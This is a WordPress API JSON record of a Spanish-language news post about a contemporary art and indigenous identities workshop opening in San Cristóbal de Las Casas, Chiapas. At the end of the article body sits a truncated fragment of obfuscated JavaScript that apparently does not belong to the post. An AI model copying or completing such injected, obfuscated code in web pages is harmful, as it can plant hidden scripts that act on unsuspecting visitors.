{"id":13190,"date":"2023-12-12T05:05:58","date_gmt":"2023-12-12T05:05:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13190"},"modified":"2023-12-12T05:05:59","modified_gmt":"2023-12-12T05:05:59","slug":"inauguran-curso-taller-de-arte-contemporaneo-e-identidades-originarias-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13190","title":{"rendered":"Inauguran Curso Taller de Arte Contempor\u00e1neo e Identidades Originarias en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"478\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702357459512-1024x478.jpg\" alt=\"\" class=\"wp-image-13191\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702357459512-1024x478.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702357459512-300x140.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702357459512-768x358.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702357459512.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal11 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- Se inaugur\u00f3 en el Centro Cultural de los Altos de Chiapas, ubicado en el emblem\u00e1tico Exconvento de Santo Domingo, el &#8220;Curso Taller Contempor\u00e1neo e Identidades Originarias&#8221;, encuentro que reuni\u00f3 a un grupo destacado de artistas est\u00e1 ciudad.Los organizadores que pertenecen a Portales del Arte, el National Museum of Mexican Art y el Centro Cultural de los Altos de Chiapas, informaron que este taller representa una oportunidad \u00fanica para explorar y enriquecer el di\u00e1logo en torno al arte contempor\u00e1neo y las identidades originarias.Asimismo, dieron a conocer que es impartido por los reconocidos artistas Carlos Rojas y Eric Mu\u00f1oz, y busca fomentar la expresi\u00f3n art\u00edstica en el contexto de las ra\u00edces culturales, proporcionando a los participantes un espacio creativo en el cual explorar y compartir sus visiones \u00fanicas.&#8221;Agradecemos el apoyo fundamental de Ra\u00fal Dur\u00f3n, Director del Centro Cultural de los Altos de Chiapas, cuyo respaldo ha permitido la realizaci\u00f3n de este taller del 10 al 15 de diciembre. La comunidad art\u00edstica de San Crist\u00f3bal de las Casas se congrega para dar vida a esta experiencia enriquecedora y prometedora&#8221;, informan en un comunicado.Y finalmente, aseguran que este encuentro refleja el compromiso continuo de estos prestigiosos espacios culturales &#8220;con el desarrollo y promoci\u00f3n del arte contempor\u00e1neo, as\u00ed como con la preservaci\u00f3n y celebraci\u00f3n de las identidades originarias que enriquecen el tejido cultural de Chiapas y de M\u00e9xico en su conjunto&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal11 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- Se inaugur\u00f3 en el Centro Cultural de los Altos de Chiapas, ubicado en el emblem\u00e1tico Exconvento de Santo Domingo, el &#8220;Curso Taller Contempor\u00e1neo e Identidades Originarias&#8221;, encuentro que reuni\u00f3 a un grupo destacado de artistas est\u00e1 ciudad.Los organizadores que pertenecen a Portales del Arte, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13191,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13190","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13190"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13190\/revisions"}],"predecessor-version":[{"id":13192,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13190\/revisions\/13192"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13191"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}